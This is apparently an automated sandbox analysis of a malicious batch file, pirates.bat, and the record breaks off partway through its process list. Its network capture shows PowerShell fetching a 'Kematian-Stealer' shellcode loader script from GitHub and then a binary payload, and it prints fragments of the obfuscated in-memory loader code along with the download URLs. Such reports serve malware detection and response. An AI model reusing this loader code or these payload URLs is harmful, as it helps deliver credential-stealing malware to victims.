                                        TimestampBytes transferredDirectionData
                                        2024-07-05 04:26:55 UTC144OUTGET /Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:55 UTC899INHTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 2974
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "fe3aacdc6907ec951179c5b0e10c992291900e024a0164ca4a7fbbedb7ebcc17"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: C00A:FCE48:21EE03:25AFB9:66877607
                                        Accept-Ranges: bytes
                                        Date: Fri, 05 Jul 2024 04:26:55 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-nyc-kteb1890099-NYC
                                        X-Cache: MISS
                                        X-Cache-Hits: 0
                                        X-Timer: S1720153616.851618,VS0,VE53
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: c5d6769d1ded693c67a2321aae728227715df841
                                        Expires: Fri, 05 Jul 2024 04:31:55 GMT
                                        Source-Age: 0
                                        2024-07-05 04:26:55 UTC1378INData Raw: 24 50 72 6f 67 72 65 73 73 50 72 65 66 65 72 65 6e 63 65 20 3d 20 27 53 69 6c 65 6e 74 6c 79 43 6f 6e 74 69 6e 75 65 27 0d 0a 66 75 6e 63 74 69 6f 6e 20 4b 65 6d 61 74 69 61 6e 4c 6f 61 64 65 72 20 7b 0d 0a 20 20 20 20 50 61 72 61 6d 20 28 24 6b 65 6d 61 74 69 61 6e 5f 6d 6f 64 75 6c 65 73 2c 20 24 6b 65 6d 61 74 69 61 6e 5f 66 75 6e 63 29 0d 0a 20 20 20 20 24 61 73 73 65 6d 20 3d 20 28 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 22 63 55 72 52 45 4e 74 64 4f 4d 41 69 6e 22 2e 28 27 47 27 20 2b 20 27 65 27 20 2b 20 27 74 41 27 20 2b 20 27 73 73 65 6d 62 6c 69 65 73 27 29 2e 49 6e 76 6f 6b 65 28 29 20 7c 20 3f 20 7b 20 24 5f 2e 22 47 4c 6f 42 41 4c 41 73 53 65 4d 42 6c 59 63 41 63 68 65 22 20 2d 41 6e 64 20 24 5f 2e 22 6c 4f 43 61 54 69 6f 4e 22 2e 28 27 53 70
                                        Data Ascii: $ProgressPreference = 'SilentlyContinue'function KematianLoader { Param ($kematian_modules, $kematian_func) $assem = ([AppDomain]::"cUrRENtdOMAin".('G' + 'e' + 'tA' + 'ssemblies').Invoke() | ? { $_."GLoBALAsSeMBlYcAche" -And $_."lOCaTioN".('Sp
                                        2024-07-05 04:26:55 UTC1378INData Raw: 64 65 42 79 53 69 67 2c 20 50 75 62 6c 69 63 27 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 22 73 74 61 6e 64 41 52 44 22 2c 20 24 66 75 6e 63 29 2e 28 27 53 65 74 49 6d 70 6c 65 27 20 2b 20 27 6d 65 6e 74 27 20 2b 20 27 61 74 69 6f 27 20 2b 20 27 6e 27 20 2b 20 27 46 6c 61 67 27 20 2b 20 27 73 27 29 2e 49 6e 76 6f 6b 65 28 27 52 75 6e 74 69 6d 65 2c 20 4d 61 6e 61 67 65 64 27 29 0d 0a 20 20 20 20 24 74 79 70 65 2e 28 27 44 65 66 69 27 20 2b 20 27 6e 27 20 2b 20 27 65 4d 65 74 68 6f 64 27 29 2e 49 6e 76 6f 6b 65 28 27 49 6e 76 6f 6b 65 27 2c 20 27 50 75 62 6c 69 63 2c 20 48 69 64 65 42 79 53 69 67 2c 20 4e 65 77 53 6c 6f 74 2c 20 56 69 72 74 75 61 6c 27 2c 20 24 64 65 6c 54
                                        Data Ascii: deBySig, Public', [System.Reflection.CallingConventions]::"standARD", $func).('SetImple' + 'ment' + 'atio' + 'n' + 'Flag' + 's').Invoke('Runtime, Managed') $type.('Defi' + 'n' + 'eMethod').Invoke('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delT
                                        2024-07-05 04:26:55 UTC218INData Raw: 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 47 27 20 2b 20 27 65 74 44 27 20 2b 20 27 65 6c 65 27 20 2b 20 27 67 61 74 65 46 27 20 2b 20 27 6f 72 46 75 6e 63 74 69 6f 6e 50 27 20 2b 20 27 6f 69 6e 74 65 72 27 29 2e 49 6e 76 6f 6b 65 28 28 4b 65 6d 61 74 69 61 6e 4c 6f 61 64 65 72 20 20 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 20 57 61 69 74 46 6f 72 53 69 6e 67 6c 65 4f 62 6a 65 63 74 29 2c 20 28 6b 65 6d 61 74 69 61 6e 5f 64 65 6c 65 67 61 74 65 73 20 40 28 5b 49 6e 74 50 74 72 5d 2c 20 5b 49 6e 74 33 32 5d 29 28 5b 49 6e 74 5d 29 29 29 2e 22 69 4e 56 4f 6b 45 22 28 24 68 54 68 72 65 61 64 2c 20 30 78 46 46 46 46 46 46 46 46 29 0d 0a
                                        Data Ascii: ervices.Marshal]::('G' + 'etD' + 'ele' + 'gateF' + 'orFunctionP' + 'ointer').Invoke((KematianLoader kernel32.dll WaitForSingleObject), (kematian_delegates @([IntPtr], [Int32])([Int])))."iNVOkE"($hThread, 0xFFFFFFFF)


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7192.168.2.463779140.82.121.3443
                                        TimestampBytes transferredDirectionData
                                        2024-07-05 04:26:56 UTC204OUTGET /Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: github.com
                                        2024-07-05 04:26:57 UTC997INHTTP/1.1 302 Found
                                        Server: GitHub.com
                                        Date: Fri, 05 Jul 2024 04:26:56 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                        Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240705%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240705T042656Z&X-Amz-Expires=300&X-Amz-Signature=9ec541a8af7357a745f9ee7f2924807d0564c84d8046cdea1a2096e0b623e658&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream
                                        Cache-Control: no-cache
                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                        X-Frame-Options: deny
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 0
                                        Referrer-Policy: no-referrer-when-downgrade
                                        2024-07-05 04:26:57 UTC3031INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.463780185.199.111.1334433852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-05 04:26:57 UTC683OUTGET /github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240705%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240705T042656Z&X-Amz-Expires=300&X-Amz-Signature=9ec541a8af7357a745f9ee7f2924807d0564c84d8046cdea1a2096e0b623e658&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: objects.githubusercontent.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:57 UTC771INHTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 3992755
                                        Content-Type: application/octet-stream
                                        Last-Modified: Sun, 30 Jun 2024 05:35:21 GMT
                                        ETag: "0x8DC98C66EE845A6"
                                        Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                        x-ms-request-id: be5d7460-101e-0036-11af-ca6c25000000
                                        x-ms-version: 2020-10-02
                                        x-ms-creation-time: Sun, 30 Jun 2024 05:35:21 GMT
                                        x-ms-lease-status: unlocked
                                        x-ms-lease-state: available
                                        x-ms-blob-type: BlockBlob
                                        Content-Disposition: attachment; filename=kematian.bin
                                        x-ms-server-encrypted: true
                                        Via: 1.1 varnish, 1.1 varnish
                                        Accept-Ranges: bytes
                                        Age: 0
                                        Date: Fri, 05 Jul 2024 04:26:57 GMT
                                        X-Served-By: cache-iad-kcgs7200102-IAD, cache-ewr18128-EWR
                                        X-Cache: HIT, MISS
                                        X-Cache-Hits: 2011, 0
                                        X-Timer: S1720153618.605705,VS0,VE47
                                        2024-07-05 04:26:57 UTC1378INData Raw: e8 1d b8 3c 00 1d b8 3c 00 b3 2c 56 3d 24 16 24 68 1b c9 41 79 02 c4 75 c0 09 bc 22 bf c1 da 01 6f 6f 96 a7 ad a1 66 b7 49 00 00 00 00 ae b4 17 85 6f b6 2f 28 4e 11 7b 33 c7 79 42 b5 b9 10 82 42 8d 94 d0 e2 b5 de 1c c5 4a 48 29 de 7b 84 22 a4 29 2b 07 f1 c9 42 54 80 86 d5 e5 af f4 1c b4 3a 57 67 b9 29 c0 05 4f 8d 2a 9f a9 f8 65 67 ab 95 76 e1 ea d3 b2 63 36 7f fa a6 4b f0 7c a2 99 37 26 79 b8 fd 2e fe b3 b5 3f 49 db 42 0b 32 4f f4 bb 36 09 4b ca 51 97 45 d9 b9 3d e2 9d 3a 7d cf 4f 73 72 30 23 02 f4 c9 5a 63 a5 4b 0e f2 64 4c cf 73 64 65 15 ba c0 e9 cf 59 64 59 25 7a b6 1c 5c e6 ea b3 94 4e c9 d3 1f d9 98 9d 89 19 93 42 b2 55 8c b9 2a 03 a6 45 ce fc 34 e3 33 6e e5 3e 28 1b 7f 0d 86 0c ed 10 61 25 5f a6 bf db d3 d9 91 a0 72 9f 51 08 09 16 c1 d9 c0 64 22 cb
                                        Data Ascii: <<,V=$$hAyu"oofIo/(N{3yBBJH){")+BT:Wg)O*egvc6K|7&y.?IB2O6KQE=:}Osr0#ZcKdLsdeYdY%z\NBU*E43n>(a%_rQd"
                                        2024-07-05 04:26:57 UTC1378INData Raw: 93 e2 3f 99 d7 8b 1e b2 17 d4 00 04 a4 7d 41 f7 4b 07 a4 96 1b 3c 67 f1 fd e6 71 41 df 51 db c7 5b e9 65 db 6e 0b 6c 3a b0 83 84 a2 65 69 96 a4 0e 57 5d a0 cc 3e cd 57 8a 7b 8e 8e 7a 9c cd 64 ed e6 ee 56 04 18 33 42 2a b6 fb b9 5c b6 70 37 af 0d 95 ed 9f 29 1d 42 79 16 e3 7e 1d a7 b9 fb 31 88 dd 1b 0a 34 70 1d b3 70 44 6f 41 c3 cd 58 09 ab f6 c7 30 2d dd 25 cc d9 9b d5 24 bb d0 09 da 00 67 53 31 6a 0e af fa 48 ba 22 6f f3 76 e0 05 b0 02 d9 03 7a 8d 2a b3 34 71 72 d9 a5 b5 f6 45 de 8e e6 2c 08 2b 0d d1 12 1f e7 57 9b 52 6f de 64 76 39 3b d6 33 d8 0e f4 5e 4c 46 75 99 de 86 19 3d 50 43 a5 9c fc f6 7c ec 18 85 fd 80 70 d9 38 12 89 7d 72 63 e9 66 25 e1 c0 6a 7a 22 ec 21 b3 11 af 66 fa fd 07 b8 fe 79 ed e1 73 be 59 99 c3 4b 44 49 3d d1 bb bf 41 ae c4 b4 63 83
                                        Data Ascii: ?}AK<gqAQ[enl:eiW]>W{zdV3B*\p7)By~14ppDoAX0-%$gS1jH"ovz*4qrE,+WRodv9;3^LFu=PC|p8}rcf%jz"!fysYKDI=Ac
                                        2024-07-05 04:26:57 UTC1378INData Raw: 0c d1 29 06 cc 17 e7 93 e6 a6 53 8c 47 ee 8c 9b df 93 c1 cb 34 c4 3d 3f 87 f1 5f 88 3f 7b 77 84 1d 56 f5 aa 9f ce a3 20 9d 00 7a f5 3e 4d 2a cd 5f 77 15 a1 83 7c 51 7f 64 b6 08 47 f3 fc e6 d6 45 31 97 fb e9 05 55 cd 12 18 49 e4 54 90 96 7e a2 40 41 63 fa 39 1c 06 fe c5 7b 3e 05 95 8c ee ba 4c 90 7e b5 71 cc 80 c6 e8 92 55 82 91 5d 3f 2e e4 c1 69 14 67 bd 56 84 ed 91 85 2a d1 33 75 6b 93 f4 61 96 8a d5 34 44 83 d6 d1 45 e4 52 51 97 b8 be 50 85 e8 18 20 0d e7 92 2c 05 cc 12 6d 5c 8b fc 4f ae b3 37 f8 3e b6 a3 ad 55 d9 ee 97 7c c8 ac 97 bb f2 43 7a 00 e5 be 01 29 8f e1 16 4c ef 4e 00 65 54 63 6f ff 6c c8 94 64 a8 5c 7c 60 7e e6 ba f3 51 74 4e c7 14 22 a5 b1 28 9c 11 1f 74 c2 99 0b 25 6c 61 1f 81 22 0e 1c 51 f3 5c 1c 80 39 32 aa b3 9e d8 5d 92 a8 6b 68 e2 a3
                                        Data Ascii: )SG4=?_?{wV z>M*_w|QdGE1UIT~@Ac9{>L~qU]?.igV*3uka4DERQP ,m\O7>U|Cz)LNeTcold\|`~QtN"(t%la"Q\92]kh
                                        2024-07-05 04:26:57 UTC1378INData Raw: a7 19 02 88 66 c3 90 0b 2d 36 14 8c c0 35 c4 b1 77 dd 16 7d 4a 8f 0b 20 7b f4 26 a3 64 1d c9 8f 20 43 24 20 fa 76 4f e5 7d c0 8c 2f d8 1e 24 90 ea fd 0f ac 14 58 fb e4 ff 0e 04 6f 62 f9 05 f1 86 82 67 be 7b 73 b9 5f 1d aa 8f 26 af 4b d8 bb 97 fe e0 da f5 fc 52 d9 14 af 98 2b 35 db f3 e8 5e 46 8f 5d ab 0e 3b 22 8a 53 3d 48 22 2b 2c 04 21 c4 95 29 0e 7e c5 e2 21 fe 96 a3 90 29 8c 5e ac 6a 89 0c 75 0d 72 e4 06 94 ac 00 55 1f a0 9f e3 cf b1 3c 8a cc d3 3f 95 2c ed 61 dd 8b ac e5 e0 26 9c 0f 97 05 54 ec 9a c2 0e 3f cc 7e 1b 5e 5c c5 3b 7c 84 0a 0a 45 b6 3a 24 66 a7 da 85 5c b2 15 a0 50 10 8c 4a 9c 60 9e 2a cf f4 70 86 b3 4f a2 0b c8 20 8d 50 73 47 fb cc 62 9b 20 99 2e a9 43 27 22 34 8e cc df dc 7f 74 47 9b 08 67 86 e7 69 22 26 54 c2 1b 2e 87 a4 f2 78 20 3b 4e
                                        Data Ascii: f-65w}J {&d C$ vO}/$Xobg{s_&KR+5^F];"S=H"+,!)~!)^jurU<?,a&T?~^\;|E:$f\PJ`*pO PsGb .C'"4tGgi"&T.x ;N
                                        2024-07-05 04:26:57 UTC1378INData Raw: 9e b1 6c 33 53 d9 4a 09 25 7d c9 8a 12 09 43 0c 91 bb 0c d2 b1 59 05 44 0c af ad 38 76 d5 c6 d4 16 76 ad 6d 2b de 59 ff 8f f2 4d cd b5 05 b8 63 e3 51 f3 de eb 74 b2 18 58 ac 29 d4 3b 90 c3 80 34 49 8c 3a d1 8b d5 a7 ea 8e fa 0f 53 e3 d8 a3 bd db cf ec 27 db 2f 2d c0 bd 3d c1 d4 df 78 ee 6b d2 a7 6c e3 0d ac be 63 44 0a 95 72 c0 13 75 62 36 11 77 1c d7 f9 a9 35 15 d2 30 87 23 38 ff ab 35 3b 9f 3f 4d 06 78 bf fd e1 13 f6 55 38 13 32 d9 b1 56 a9 ca 0d d2 fd 30 fb 22 09 6f 68 ff a0 c0 f0 dd 9f 43 75 32 eb 27 e3 be fb 0c be 81 0f 85 f8 03 52 d5 cb 0e da 7b 55 f3 14 66 5a 1f 38 69 ed 2d c6 eb c0 81 de 38 a8 63 e9 50 4c 78 aa 73 33 59 be eb 1f 5e 30 bd a9 48 e1 00 52 ef 63 ae e3 c9 cf 42 a0 6d c2 92 92 22 8c 8f 95 04 1d 7c 8a 4d 89 bf 55 c9 43 8b 6c 59 42 2d 4d
                                        Data Ascii: l3SJ%}CYD8vvm+YMcQtX);4I:S'/-=xklcDrub6w50#85;?MxU82V0"ohCu2'R{UfZ8i-8cPLxs3Y^0HRcBm"|MUClYB-M
                                        2024-07-05 04:26:57 UTC1378INData Raw: eb 9f 8e 7c f7 ff 3a ef 3d 12 11 b8 67 8a 61 22 7b 95 80 f8 77 ba 89 8a 0a 68 b6 73 9c 09 95 b5 97 9f 7e a8 5b 2b 5d a1 df 71 04 58 9c e6 21 44 c2 91 2c 0f a5 19 e2 9a 83 9c 8a b0 0d 42 69 1b 63 82 d7 1c 84 30 59 db 91 f1 88 44 34 8e a8 67 9d 27 df 79 9a a6 6a 07 02 cf f8 32 f3 16 33 4d 94 e2 f7 cb 93 89 f7 7a 49 54 2a a5 7b d7 6d 64 49 59 f1 94 60 5e 7b 14 d1 26 97 5f e7 4b 29 55 e0 ec cc 78 47 c1 68 70 24 8d 7d 15 1e cc 41 57 a5 4e 74 57 a5 77 78 b4 1f 6e d3 a7 de 29 4f 66 f5 73 cb 26 6b 04 ab e7 f1 09 0e a8 a3 1b 95 47 09 e1 10 e0 20 9a dc 5f 2f 6f 4d 41 cf 20 bb a8 9a b6 15 0d 15 1c ee 62 09 aa 73 c4 04 a7 7b 68 39 ec 59 be 1a 2f 87 c0 94 83 92 df 2d bb d2 a8 bd b9 3e f3 4a e2 5b 28 fc 63 f0 05 02 2f 3d 67 03 85 60 c8 26 63 4f 81 b4 d9 1d c7 80 48 7a
                                        Data Ascii: |:=ga"{whs~[+]qX!D,Bic0YD4g'yj23MzIT*{mdIY`^{&_K)UxGhp$}AWNtWwxn)Ofs&kG _/oMA bs{h9Y/->J[(c/=g`&cOHz
                                        2024-07-05 04:26:57 UTC1378INData Raw: ce c2 2d 93 cd fd b2 d5 06 63 66 c0 8b 51 fe 93 3f eb fb f1 1d a0 54 4b d9 ea 93 3a a1 69 7f 07 bf cf ce 84 bb 3c 50 15 3a 1e 0e f0 20 f3 ef f2 7a c7 79 17 44 ff 96 2b b7 97 22 a2 2e bc 64 4f a5 14 8b 0d 13 30 b0 aa 71 c8 fa 73 36 bf 10 11 04 21 82 8e 76 14 c1 d0 89 e5 76 12 83 b7 65 be 6a ec 77 2a e0 18 24 c4 ee 8a 79 e7 ff 9f 28 61 60 22 3d 58 9d a4 38 31 95 a9 7c e9 dc 18 24 db 7f 1a a5 76 df 93 54 50 ff 11 f1 cc 02 10 d0 a2 32 fd 55 5c 27 4f 63 22 62 8e 60 6c 82 30 54 97 62 d2 f2 b1 4b 61 d0 61 88 53 74 5a 96 4e a4 21 cf f6 6d 6f 69 94 41 44 a4 61 7d 81 11 ee 42 d8 ae fa 43 4b d8 63 9f ba a1 a3 57 d7 f7 1f d9 fe 7a 07 0a c0 e2 52 97 c6 38 20 05 68 ee 57 e5 13 20 58 2d 29 f8 b9 28 c0 90 2b ce e4 19 44 04 6c 83 9d 85 4d 17 3d 0f 7a 61 83 80 26 eb c5 b7
                                        Data Ascii: -cfQ?TK:i<P: zyD+".dO0qs6!vvejw*$y(a`"=X81|$vTP2U\'Oc"b`l0TbKaaStZN!moiADa}BCKcWzR8 hW X-)(+DlM=za&
                                        2024-07-05 04:26:57 UTC1378INData Raw: ff f6 57 35 b7 e0 9d c6 d7 b0 96 79 5b 33 86 f1 d6 f5 81 32 b6 44 19 fb 87 d5 21 6f 72 af 4c a7 ae fa e0 23 0e 3b 1d 9c 84 e2 01 f4 f4 21 74 84 87 d6 53 be d1 2f cb 4e 3a da a9 ac 3a e1 5c 2f 97 e8 09 91 b7 3d d4 9f d7 ab ba 35 1d 3f 1e e9 82 dc 99 87 f4 92 73 4f aa ea e5 d2 66 66 e0 05 98 bd 5c 84 81 7e d5 12 1d 7e 40 3a 21 e1 96 df 82 f4 2e e4 fd 81 32 79 ea d5 c4 dd 57 d8 13 a6 56 d5 b2 84 ce f6 56 0a 5c 6f e5 de e3 c9 86 a9 c7 52 78 b6 68 bf db 74 de 38 14 49 78 09 5d f6 af 3e 81 71 be 1c a7 65 61 1c 8b 4d b6 de 6d bd d9 d3 bf 11 3d 79 dc 7a a4 8e cb 30 9b 51 24 0b 68 54 75 31 34 52 d9 2b 71 e4 2a b7 0b 91 2f 51 79 9e 58 8f 75 d0 66 43 b7 d6 59 9f 5f ab c3 f3 90 f9 f0 a4 c1 e5 72 c6 28 8c 0c b4 14 54 05 ac 24 81 5d a1 c8 fc a1 f7 78 97 41 2d 91 3a a8
                                        Data Ascii: W5y[32D!orL#;!tS/N::\/=5?sOff\~~@:!.2yWVV\oRxht8Ix]>qeaMm=yz0Q$hTu14R+q*/QyXufCY_r(T$]xA-:
                                        2024-07-05 04:26:57 UTC1378INData Raw: 45 4a e4 07 1f 6b cc 49 5f 39 97 9e 6c 2a 7f be 98 2b 68 66 9e 2a 47 3e 72 67 6c 22 bc c1 08 96 fa 30 f3 0f 17 b0 20 c7 26 cf 80 b5 34 2a 91 ca b6 a6 16 4d 60 51 78 e7 b9 ec 2e 6f 75 19 d7 18 75 5a 29 ea 93 43 fc c4 34 0e 01 ee a5 0d 12 cd f6 73 9b 56 2e 97 34 7a 45 80 99 33 67 9e 40 1f e5 97 7b 58 c4 f7 4d 09 62 a8 04 65 aa a3 9a ad 54 2b e2 bc 8e bc 9e 9f 6c 7b a0 5d 68 b1 13 17 ba fb c2 f9 d0 57 ae 17 5c 62 0b 2b 95 4a 17 1c 8a 59 2e e6 b3 76 a8 45 93 fe 75 bd 78 3d ba 00 f6 25 76 b0 66 8a 21 f2 74 54 a9 7b 7a ae 43 ab ee 76 86 3f 9e 88 2e 01 4e 3a 30 63 08 b2 36 1a 44 dc bc 1d f9 aa 2f cb c7 cb 59 f0 38 bf d2 30 d1 59 bb f0 d8 cb 3b 2b 76 e7 10 8e fa fe 6b 00 4e 5e f4 35 f1 78 e0 38 03 c5 a3 03 f0 2f a1 cd 88 34 89 a2 a3 0e 72 44 58 84 30 1a 78 a2 29
                                        Data Ascii: EJkI_9l*+hf*G>rgl"0 &4*M`Qx.ouuZ)C4sV.4zE3g@{XMbeT+l{]hW\b+JY.vEux=%vf!tT{zCv?.N:0c6D/Y80Y;+vkN^5x8/4rDX0x)
                                        2024-07-05 04:26:57 UTC1378INData Raw: 25 06 2e 65 c1 09 02 f5 7e ea c3 d2 e6 e0 7b ae 30 73 a1 53 aa 94 4b 42 a4 46 57 8e 15 4f 39 e5 2c c3 25 14 05 81 12 14 d1 dc ac 08 b7 ab 11 43 4b eb 97 4a 28 31 53 9f 9c 51 73 f4 d8 69 37 4e ee 2a d8 e5 6b 00 7f 09 fc 13 32 46 56 fb d3 99 95 da 81 19 93 df 20 11 f8 1f 7b 52 8a 5f 28 4d 99 d0 9d 94 16 3f 30 34 0f e0 76 39 16 e5 2d cc f7 ae 9d 90 07 62 1b b4 15 bb 98 4e b9 9c 03 6c 2f a0 b9 a8 f5 d7 89 a2 8e c7 08 9c 4c 29 ac a8 16 df da 1d 88 f4 5b 28 0e 83 a1 c3 de d7 44 9c 7f dc 6e c0 bb be 6f 4c bd b0 9b ec 01 61 2f ec 0f f1 12 ad 78 27 cc 89 32 12 fe ba 02 fa 91 6c 8d 68 f5 c9 52 fd 03 b0 77 32 b0 b4 91 75 69 f1 45 c6 c9 9e 84 b2 0a 6e 4a da 5c dd 84 8a 79 5d 91 09 d5 1b fc fc 30 c7 c6 d7 10 08 38 42 87 73 dd 75 c9 df 5f 06 63 d7 e7 3d e5 8b 4f 1b 6f
                                        Data Ascii: %.e~{0sSKBFWO9,%CKJ(1SQsi7N*k2FV {R_(M?04v9-bNl/L)[(DnoLa/x'2lhRw2uiEnJ\y]08Bsu_c=Oo


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:00:25:53
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:1
                                        Start time:00:25:53
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:2
                                        Start time:00:25:53
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:cscript //nologo temp.vbs
                                        Imagebase:0x7ff686ce0000
                                        File size:161'280 bytes
                                        MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:3
                                        Start time:00:25:54
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:4
                                        Start time:00:25:54
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:5
                                        Start time:00:25:54
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:00:25:56
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
